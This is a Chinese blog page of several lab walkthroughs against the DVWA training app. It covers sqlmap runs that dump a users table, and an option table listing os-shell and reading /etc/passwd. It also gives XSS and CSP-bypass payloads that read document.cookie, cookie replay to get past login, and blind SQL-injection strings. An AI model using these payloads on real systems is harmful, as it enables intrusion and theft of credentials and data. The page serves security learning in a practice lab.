施坤的博客

sqlmap实践

发表于 2022-02-18 更新于 2022-02-25 分类于安全测试阅读次数： Valine：

说明

sqlmap 是一个开源的渗透测试工具，可以用来自动化的检测，利用SQL注入漏洞，获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过带外数据连接的方式执行操作系统命令。

安装

下载最新源码

1	git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

使用方法

E:\app\sqlmap-dev>python -V
Python 3.7.9

E:\app\sqlmap-dev>python sqlmap.py -h
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.2.4#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: sqlmap.py [options]

实践

之前的文章写过了DVWA通关指南-SQL-Injection-sql注入，本次采用sqlmap来实践
dwva 安全等级设置为low，在sql注入界面输入1，点击提交
- 把cookie拷贝：security=low; PHPSESSID=aldgnbndvch51dlisl97mvp1n4
- 得到发送请求的url：http://xxxxxx/DVWA-2.0.1/vulnerabilities/sqli/?id=1&Submit=Submit

默认注入

我们要以刚才发现的 ?id 为突破点，使用sqlmap 对DVWA 进行sql 注入测试，batch参数表示默认选项

1	E:\app\sqlmap-dev>python sqlmap.py -u "http://IpAddress/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aldgnbndvch51dlisl97mvp1n4" --batch

发现了4个注入漏洞类型（基于布尔的盲注检测，时间的盲注检测，错误的检测，union联合查询的检测）；还有一种sqlmap也支持就是堆叠查询的检测，其实就算多语句查询，多语句用;隔开

拿数据库

拿数据库信息的命令

1	E:\app\sqlmap-dev>python sqlmap.py -u "http://IpAddress/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aldgnbndvch51dlisl97mvp1n4" --dbs

扫描出来了两个数据库

拿表

查看某数据库并展示所有表命令

1	E:\app\sqlmap-dev>python sqlmap.py -u "http://IpAddress/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aldgnbndvch51dlisl97mvp1n4" --batch -D dvwa --tables

得到了两个表

表中列

查看某数据库某表的所有列：

1	E:\app\sqlmap-dev>python sqlmap.py -u "http://IpAddress/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aldgnbndvch51dlisl97mvp1n4" --batch -D dvwa -T users --columns

得到了列数据由8个

查询数据

E:\app\sqlmap-dev>python sqlmap.py -u "http://IpAddress/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aldgnbndvch51dlisl97mvp1n4" --batch --dump -C "user_id,user,password" -T "users" -D "dvwa"

# --dump 转储数据库表项,查询字段值
# -C 要进行枚举的指定列名
# -T 要进行枚举的指定表名
# -D 要进行枚举的指定数据库名

密码被自动解密了

其他参数

参数名	说明	实例
–data	提交的时候要携带的参数	sqlmap.py -u URL –data“username=a&password=a”
–dbms	指定注入的数据类型	–dbms mysql
–threads	多线程，默认是单线程为1	–threads=10
-r	post数据包	sqlmap -r a.txt -p username 入txtpost数据包参数username进行注入
–sql-shell	接获取一个sql shell	sqlmap -u url?id＝11 –sql-shell
–os-shell	获取一个cmd shell	sqlmap -u url?id＝11 -os-cmd=ipconfig
–file-read	读取服务器文件	sqlmap -u http://url?id＝11 –file-read=/etc/passwd
–file-write	写入本地文件到服务器	qlmap -u http://url/sql.php?id＝11 –file-write /test/test.txt –file-dest /var/www/html/1.txt

更多参数说明可以参考这里

Burp-Suite常用模块介绍

发表于 2022-02-16 更新于 2022-02-25 分类于安全测试阅读次数： Valine：

Proxy

代理模块，主要时拦截http/https的请求，一些拦截端口，拦截请求（过滤）/响应（替换）等设置都在这个模块

实例

访问https时，需要ssl证书，比如访问csdn时，直接抓包就提示，本次主要时在浏览器中设置，如果在proxy中导入证书，参考这里

浏览器中输入：127.0.0.1:8080，点击右上角CA证书按钮

谷歌浏览器-设置-搜索：证书

导入刚刚下载的证书直到完成

找到刚刚导入的证书，在中间证书颁发机构下面，点击导出

选择base64

在证书机构中导入刚才的证书文件，并选择【信任使用此CA标识的网站】

重启下浏览器和burpsite

Intruder

暴力破解模块，常用场景就算爆破登录密码，参考这里的实例

Repeater

重发请求，使用场景：拦截请求后，action发送到Repeater，打开Repeater然后点击发送，可以看到发送请求和响应数据

Sequencer

没有用过
用于检测数据样本随机性质量的工具，通常用于检测访问令牌是否可预测、密码重置令牌是否可预测等场景，通过Sequencer不断发包，抓取对应的token值等等，对这些随机令牌的样本，进行数据分析，能很好地降低这些关键数据被伪造的风险
DVWA靶场中Weak Session IDs（弱会话），应该可以验证，有兴趣可以参考这里

Decoder

Decoder用于对字符串进行加密解密的操作，实际场景没有使用过

Comparer

两个请求的对比，有兴趣的可以参考这里

Extender

扩展模块，比如插件的使用就是这里，后续单独介绍此模块

Project options

项目选择的配置选项，一般都是保持默认，有兴趣可以参考这里介绍

User options

用户选择的一些常用配置，一般都是保持默认，有兴趣可以查看这里介绍

Target

目标工具包含了SiteMap，用你的目标应用程序的详细信息。它可以让你定义哪些对象在范围上为你目前的工作，也可以让你手动测试漏洞的过程，Target分为site map、scope、 issue definitions

site map

所有被拦截的请求都在这里地图上展示，常见场景只查看csdn的请求：

右击后，点击Add to scope

打开scope查看到了刚刚添加的数据，就算白名单

鼠标点击Site map的过滤文本框

选择只展示scope中设置的条目

最终点击re-enable按钮

issue definitions

用Scanner扫描可以检测出的漏洞列表

spider

新版本的爬虫模块在这里，被隐藏了

可以看到爬虫后的一些文件

Scanner

Burp Scanner的功能主要是用来自动检测web系统的各种漏洞，我们可以使用Burp Scanner代替我们手工去对系统进行普通漏洞类型的渗透测试，从而能使得我们把更多的精力放在那些必须要人工去验证的漏洞上。

实践

点击New scan（主动扫描，旁边的New live task为被动扫描）

输入需要扫描的地址

填写登录的密码

扫描中

点击这可以看到一些扫描情况

发现高危漏洞

明文传输密码

导出报告

DVWA通关指南-JavaScript Attacks

发表于 2022-02-15 更新于 2022-02-25 分类于安全测试阅读次数： Valine：

概述

就算js前端攻击

安全等级Low

发现输入success提交是无效的

源码分析

后台代码

文本框(phrase)输入内容，经过md5+自定义函数（rol13）转换后，最终赋值给token

页面代码

查看页面发现 token的值是一个隐藏控件，并且是一个固定值

看其他人的博客，直接能看到index.php文件的逻辑，我试过了这样不行

转到服务器上看下具体的index.php代码

# 不知具体的Index.php文件在哪里，采用模糊搜索的方式找到了php文件
[root@VM-24-13-centos DVWA-2.0.1]# grep -r 'You got the phrase wrong'
vulnerabilities/javascript/index.php:                   $message = "<p>You got the phrase wrong.</p>";
...
[root@VM-24-13-centos javascript]# pwd
/var/www/html/DVWA-2.0.1/vulnerabilities/javascript
[root@VM-24-13-centos javascript]# cat index.php

看下核心代码就清楚了，整个完整逻辑是这样

文本框(phrase)输入内容，经过md5+自定义函数（rol13）转换后，最终赋值给token（隐藏控件）
用token的值和加密后的success（md5(rot13)函数）对比

开始攻击

既然知道了整个逻辑，只要输入已经加密过的success字符串即可
谷歌浏览器按f12，打开console，输入：md5(rot13("success"))得到了值为：38581812b435834ebf84ebcc2c6424d6

页面文本框输入：success，点击提交

抓包拦截请求修改token的值为：38581812b435834ebf84ebcc2c6424d6，点击发送

页面上展示通过

安全等级为Meduim

源码分析

其实就是do_someting对phrase变量进行反转，如输入的success，就是sseccus，生成的token值=XXsseccusXX

开始攻击

页面上输入success

token直接改为XXsseccusXX

后续攻击

不实践了，直接参考这里

DVWA通关指南-CSP Bypass(内容安全策略)

发表于 2022-02-15 更新于 2022-02-25 分类于安全测试阅读次数： Valine：

概述

CPS即内容安全策略，实质就是白名单制度，开发者明确告诉客户端，哪些外部资源可以加载和执行，等同于提供白名单。它的实现和执行全部由浏览器完成，开发者只需提供配置。CSP 大大增强了网页的安全性。攻击者即使发现了漏洞，也没法注入脚本，除非还控制了一台列入了白名单的可信主机。

开启方法

抄录于这里

两种方法可以启用 CSP。一种是通过 HTTP 头信息的Content-Security-Policy的字段。

1 2	Content-Security-Policy: script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:

另一种是通过网页的<meta>标签

1	<meta http-equiv="Content-Security-Policy" content="script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:">

上面代码中，CSP 做了如下配置。

脚本：只信任当前域名
<object>标签：不信任任何URL，即不加载任何资源
样式表：只信任http://cdn.example.org和http://third-party.org
框架（frame）：必须使用HTTPS协议加载
其他资源：没有限制

启用后，不符合 CSP 的外部资源就会被阻止加载。

安全等级为Low

结论：攻击失败，原因分析在下面有说明

源代码分析

从源码查看设置了headerCSP，可以知道以下语句可以被执行：

https://pastebin.com
hastebin.com
example.com
code.jquery.com
https://ssl.google-analytics.com

f12查看当前页面请求，也能发现CSP的设置

开始攻击

首先在https://pastebin.com/里边创建一个JavaScript代码alert("hahaha")保存记住链接

点击右上角的raw

得到了分享链接：https://pastebin.com/raw/PgTLeSd2

把得到的链接输入输入框中

发现无论是否挂梯子，都不会弹出提示框，经过抓包分析，单独在浏览器中请求:https://pastebin.com/raw/PgTLeSd2成功，输入到文本框中后**发现有跨域问题，暂时不知如何解决**
下图就是执行pastebin的请求，虽然请求响应为200，但是无任何响应数据

打开Console发现出现类似于跨域报错问题

安全等级为Medium

源码分析

unsafe-inline：当csp有Unsafe-inline时, 并且受限于csp无法直接引入外部js, 不过当frame-src
为self, 或者能引入当前域的资源的时候, 即有一定可能能够引入外部js。
nonce-source，仅允许特定的内联脚本块。如源码中：nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA='

开始攻击

直接输入：<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>

安全等级为High

源码分析

后台代码

这里可以看到除了自身，其余的外部资源全部过滤了

前端js

前端直接调用了一个回调函数solveSum，没有对此传参进行任何处理

开始攻击

谷歌浏览器按f12，打开source页签，找到high.js文件，加个断点，修改callback参数为alert(document.cookie),记得按ctrl+s保存修改

点击页面上的按钮

点击继续运行按钮

出现弹框

安全等级为

源码分析

前端没有回调函数了

本文主要操作步骤来源这里

DVWA通关指南-XSS(Stored)

发表于 2022-02-14 更新于 2022-02-25 分类于安全测试阅读次数： Valine：

概述

上篇介绍了DVWA通关指南-XSS(Reflect)-反射性xss，本篇开始介绍储存型跨站脚本攻击。
就是被后台进行了持久化处理。再次访问的时候会被调用执行

三种xss区别

存储型XSS：你发送一次带XSS代码的请求，以后这个页面的返回包里都会有XSS代码；
反射型XSS：你发送一次带XSS代码的请求，只能在当前返回的数据包中发现XSS代码；
DOM型XSS：你发送一次带XSS代码的请求，在返回包里压根儿就找不到XSS代码的影子

安全等级为Low

源码分析

trim(string,charlist)：移除字符串两侧的空白字符或其他预定义字符，预定义字符包括、\t、\n、\x0B、\r以及空格，可选参数charlist支持添加额外需要删除的字符；
mysql_real_escape_string(string,connection)：对字符串中的特殊符号（\x00，\n，\r，\，‘，“，\x1a）进行转义；
stripslashes(string)：删除字符串中的反斜杠。

从源码中可以看到，对输入的name参数和message参数并没有做XSS方面的过滤与检查，并且数据存储在数据库中，所以存在明显的存储型XSS漏洞；

开始攻击

message输入： <script>alert('XSS')</script>，点击sign按钮，出现弹框

安全等级为Meduim

清空数据后，然后把low的攻击代码提交后，不成功

源码分析

由于对message参数使用了htmlspecialchars函数进行编码，因此无法再通过message参数注入XSS代码；
但是对于name参数，这里是基于黑名单的思想，使用str_replace函数将输入中的script删除，把script脚本当做字符串来处理；仍然存在存储型的XSS。

开始攻击

修改name的长度为100

name输入<img src=x onerror=alert(1)>，message攻击失败

每次打开这个页面，都会出现弹框
当然还可以尝试，大写绕过：<ScRipt>alert(1)<ScRipt>和双写绕过：<scr<script>ipt>alert(1)</script>等

安全等级为High

源码分析

都用到了preg_replace()函数，它彻底的过滤了<script></script>，不能绕过，同时针对于message模块，也有相当强大的过滤策略，message不存在存储型XSS漏洞

开始攻击

采用安全等级为meduim一样的方式，name输入： <img src=x onerror=alert(1)>，img调用图片，src所描述路径不存在，会导致onerror执行，从而时alert(1)函数触发，回显1

安全等级为impossible

源码分析

在impossible等级下，针对于message与name模块都使用 stripslashes()、mysql_real_escape_string()、以及htmlspecialchars()函数
并且对于已经存在的xss数据，当前页面也会过滤，如果是低，中，高的安全等级对于已经存在的xss，再次打开页面时，会弹出提示框

本文操作步骤主要来自这里

DVWA通关指南-XSS(Reflect)-反射性xss

发表于 2022-02-14 更新于 2022-02-25 分类于安全测试阅读次数： Valine：

概述

上篇介绍了DVWA通关指南-DOM-XSS-DOM型跨站脚本攻击，本篇开始介绍(Reflect)-反射性xss
反射性xss，主要需要通过URL构造等手段，才能触发的XSS漏洞，非持久化；反射型xss实际上是包括了dom - xss了，关键点仍然是在通过url控制了页面的输出（dom-xss也类似，只因为输出地点不同而导致结果不一致）。
常见注入代码

1
2
3

<script>alert(1)</script>
<img src=1 onerror=alert(1) hidden="true"/>
<iframe onload=alert(1) height="0" width="0" hidden="true"/>

安全等级Low

分析源码

只是判断了name是否有值，其他没有做过滤

开始攻击

直接修改name=<script>alert(1)</script>#

安全等级为Medium

源码分析

过滤了script标签

开始攻击

直接把script改成大写：name=<Script>alert(1)</Script>#

安全等级为High

源码分析

替换所有与<script>相关的字符，那么就采用a或iframe等无需script标签的方式绕过。

开始攻击

采用a标签：name=<a href=http://XXX.xxx.xx.xx>登录</a>，可以直接点击登录

安全等级为Impossible

源码分析

用了htmlspecialchars函数，将特殊字符转换为 HTML 实体

总结

利用：如果没有对特殊字符进行HTML转义，都存在被XSS利用的漏洞
防御：数据返回前端页面前，将【<】【>】【”】【’】【&】全转义了，既可！
本文主要步骤来自这里

DVWA通关指南-DOM-XSS-DOM型跨站脚本攻击

发表于 2022-02-14 更新于 2022-02-25 分类于安全测试阅读次数： Valine：

详解

XSS

XSS(跨站脚本攻击)，是指恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。
XSS存在的根本原因是,对URL中的参数和对用户输入提交给web server的内容,没有进行充分的过滤

分类

持久化 XSS：恶意代码通常来自网站数据库。
反射式 XSS：恶意代码通常来自用户请求。
基于 DOM 的XSS：漏洞通常在客户端而非服务端，DOM XSS 是由于浏览器解析机制导致的漏洞，服务器不参与，而存储型与反射型都需要服务器响应参与

危害

从以下我们可以知道,存储型的XSS危害最大。因为他存储在服务器端,所以不需要我们和被攻击者有任何接触, 只要被攻击者访问了该页面就会遭受攻击。而反射型和DOM型的XSS则需要我们去诱使用户点击我们构造的恶意的URL, 需要我们和用户有直接或者间接的接触,比如利用社会工程学或者利用在其他网页挂马的方式。

							|--->窃取cookie
						|--->网络钓鱼
	|------->针对用户-->|--->放马挖矿	
	|					|--->广告刷流量
XSS----|					
	|					
	|					|--->篡改页面
	|----->针对web服务->|--->传播蠕虫
						|--->内网扫描
						|--->劫持后台

DOM型XSS

DOM型XSS其实是一种特殊类型的反射型XSS，它是基于DOM文档对象模型的一种漏洞。
用户请求一个经过专门设计的URL，它由攻击者提交，而且其中包含XSS代码。服务器的响应不会以任何形式包含攻击者的脚本。当用户的浏览器处理这个响应时，DOM对象就会处理XSS代码，导致存在XSS漏洞。

什么是DOM

知道html的知识，应该都清楚什么是DOM，比如一个典型的html格式

<html>
	<head></head>
	<body>
		<div id="wap">
			<img src="1.jpg" />
		</div>
	</body>

常见注入代码

1
2
3

<script>alert(1)</script>
<img src=1 onerror=alert(1) hidden="true"/>
<iframe onload=alert(1) height="0" width="0" hidden="true"/>

安全等级为Low

服务器代码

源码分析

服务器代码

可以看到代码中没有做任何保护，而表单是让我们选择语言
点击select，可以看到?default=English,所以可以在=号后插入xss payload

前端代码

右键查看前端源码，发现有URI解码的函数，被前端执行

POC、EXP、Payload与Shellcode

POC，全称”Proof of Concept”，中文“概念验证”，常指一段漏洞证明的代码。

EXP，全称”Exploit”，中文“利用”，指利用系统漏洞进行攻击的动作。

Payload，中文“有效载荷”，指成功exploit之后，真正在目标系统执行的代码或指令。

Shellcode，简单翻译“shell代码”，是Payload的一种，由于其建立正向/反向shell而得名。

开始攻击

直接把请求参数改为：default=<script>alert(document.cookie)</script>，就获取到了cookie

安全等级为Medium

源码分析

主要过滤了script标签

开始攻击

直接把参数改为：</option></select><img src=1 onerror=alert("xss")>，这里的是为了破坏选择框的结构。

安全等级High

源码分析

default=只允许是French、English、German、Spanish、这几个通过。（采用了白名单过滤）

开始攻击

用#号绕过提交到服务器，参数改为：default=English#</option></select><img src=1 onerror=alert(document.cookie)>

安全等级为 Impossible

源代码分析

后台什么也不做

前端去除了URI解码的函数，默认不解码，所以无法被前端执行。

总结

利用：任何URL带参页面，都可以尝试渗透
预防：在页面跳转时，不要过分依赖URL数据，尽量通过POST重新获取数据
本文操作步骤来自这里

DVWA通关指南-Weak Session IDs(弱会话ID)

发表于 2022-02-11 更新于 2022-02-25 分类于安全测试阅读次数： Valine：

总结

对于本篇的攻击方式，感觉应该有问题，其实无论安全等级为何种，只要在谷歌打开dvwa抓包到cookie值后，然后再火狐浏览器打开url，修改为谷歌dvwa中cookie值后，都能绕过登录
但是我搜索了其他博客，都是采用这样的方式来做的

概念

用户访问服务器的时候，一般服务器都会分配一个身份证 session id 给用户，用于标识。
获得session后，用户访问页面就不用登陆，只需要携带session就可以了。

如何利用

由于SessonID是用户登陆后拥有的唯一认证凭证，因此黑客不需要再攻击登陆过程，就可以获取访问权限
常见类型保存在cookie中，保存在url中(太不安全)

安全等级Low

用谷歌浏览器打开dvwa

源码分析

服务器每次生成的session_id加1给客户端， setcookie("dvwaSession", $cookie_value);就是设置session的值

开始攻击

抓包，得到cookie的值：

Cookie: dvwaSession=4; security=low; PHPSESSID=e1r12c4ddu75vdmch70gkmr087
得到请求连接为：http://XXXX1/DVWA-2.0.1/vulnerabilities/weak_id/

打开火狐浏览器（没有自行安装）,输入上面的url:http://XXXX1/DVWA-2.0.1/vulnerabilities/weak_id/

抓包火狐发送的请求，发现security=impossible，并不是Low，据我观察好像在登录后才会读取security的值，不然默认就是impossible

把cookie改过来：dvwaSession=4; security=low; PHPSESSID=e1r12c4ddu75vdmch70gkmr087，点击发送

安全等级为Medium

源代码分析

采用time函数获取时间戳，作为cookie值(session)

开始攻击

谷歌浏览器抓包后，得到 cookie:dvwaSession=1644566404; security=medium; PHPSESSID=e1r12c4ddu75vdmch70gkmr087

注意dvaSession的值为时间戳，需要这里我们就需要去时间戳的网站进行转换：https://tool.lu/timestamp/

火狐浏览器先退出登录的DVWA，输入http://XXXX1/DVWA-2.0.1/vulnerabilities/weak_id/

抓包修改cookie的值为：dvwaSession=1644566404; security=medium; PHPSESSID=e1r12c4ddu75vdmch70gkmr087

成功跳过登录验证，发现一个奇怪问题，就算是谷歌浏览器中设置了安全等级的难度，在火狐请求中直接修改cookie的值就能绕过？

安全等级High

源码分析

首先使用!isset()函数对session变量进行检查，如果没有进行赋值。则设置为0，然后每一次都递增1。
然后将session变量进行MD5加密后赋值为cookie_value变量。
最终，将 cookie_value这个值发送给浏览器作为cookie。
这里进行哈希加密处理，但初始的值始终是从0开始这种形式作为cookie

开始攻击

谷歌浏览器，点击生成按钮

抓包谷歌浏览器中的请求，发现请求参数其实和安全等级为medium一样的

发给重发器观察下

在重发去中发送请求，得到dvwaSession的值为：e4da3b7fbbce2345d7772b0674a318d5

用在线md5解密工具看看，这样的话就明白了它的逻辑，又服务器端提供dvwaSession在low的基础上加入了MD5加密

把构造的cookie复制：dvwaSession=e4da3b7fbbce2345d7772b0674a318d5; security=high; PHPSESSID=e1r12c4ddu75vdmch70gkmr087
打开火狐浏览器你，输入url，抓包拦截,修改cookie的值，dvwaSession的值输入的是时间戳也能成功
其实这里的攻击我并没有看出和安全等级为中的时候的区别

点击发送后，成功绕过登录

安全等级为impossible

分析源码

$cookie_value采用随机数+时间戳+固定字符串”Impossible”，再进行sha1运算，完全不能猜测到dvwaSession的值。

参考这里

DVWA通关指南-SQL Injection（Blind盲注)

发表于 2022-02-10 更新于 2022-02-25 分类于安全测试阅读次数： Valine：

概述

与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。
盲注举个例子：比如本次的dvwa中，输入id后，只有两种结果：存在和不存在

普通SQL注入	SQL盲注
执行SQL注入攻击时，服务器会响应来自数据库服务器的错误信息，信息提示SQL语法不正确等	服务器不会直接返回具体的数据库错误or语法错误，而是会返回程序开发所设置的特定信息（也有特例，如基于报错的盲注）
一般在页面上直接就会显示执行sql语句的结果	不会直接显示sql执行的结果
	有可能出现不确定sql是否执行的情况

可以完全参考https://www.jianshu.com/p/757626cec742

盲注类型

基于布尔值的盲注；
基于时间的盲注；
基于报错的盲注；

在本次实验中只演示基于布尔值的盲注与基于时间的盲注；

盲注过程

判断是否存在注入，注入是字符型还是数字型；
猜解当前数据库名；

猜解数据库的长度；猜解数据库的名称；
猜解数据库中的表名；

猜解库中有几个表；猜解表的长度；猜解表的名称；
猜解表中的字段名；

猜解表中有几个字段；猜解字段的长度；猜解字段的名称；
猜解数据；

安全等级为Low

对参数id没有做任何检查、过滤，存在明显的SQL注入漏洞；
同时SQL语句查询返回的结果只有两种：User ID exists in the database；User ID is MISSING from the database；

开始攻击

基于布尔值的盲注

判断注入类型

判断是否存在注入，注入是字符型还是数字型
输入1，查询成功；

输入1' or '1'='1#，查询成功，证明存在字符型SQL注入；

猜解当前数据库名

猜解数据库名的长度

发现输入：1' and length(database()) =4 #，返回正确

猜数据库名字

分别输入，其实他们的值分别为：d,v,w,a,联合起来就是：dvwa
注意substr这里的语法，substr(str,1,1)，表示截取字符串从第一位开始，截取一个字符，substr(str,2,1)表示截取字符串从第2位开始，截取一个字符

1' and ascii(substr(database(),1,1))=100#       

1' and ascii(substr(database(),2,1))=118#        

1' and ascii(substr(database(),3,1))=119#        

1' and ascii(substr(database(),4,1))=97#

ascii需要结合下面的表进行查看，比如ascii(substr(database(),1,1))=100 就算等于d

猜解数据库中的表名

猜解数据库中表的个数

有两个表，输入：1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2#

猜解数据库中表的长度

如（guestbook=9,users=5）
- 输入 1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=9#
- 输入：1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=5#

猜解数据库中的表名

如（guestbook，users），输入下面的值，得到guestbook中的g
注意limit语法，如：select * from tablename limit 2,4，表示即取出第3条至第6条，4条记录
那么下面的语句解释我：查询到所有表后（取第一个表）用substr截取（规则为从第一个字符开始，截取长度为1），最终用ascii进行转换得到值（103）和103进行对比

1	1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 #

安装上述所述，依次类推可以分别得到uestbook等的值

--值为u
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=117 # 

--值为e
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=101 #

比如第二个表（users)的第一个数据的ascii值为u

--注意limit的值取的是第2条至第3条记录，就是第二个表，得到的值为u
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,2),1,1))=117#

-- 值为s
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,2),2,1))=115#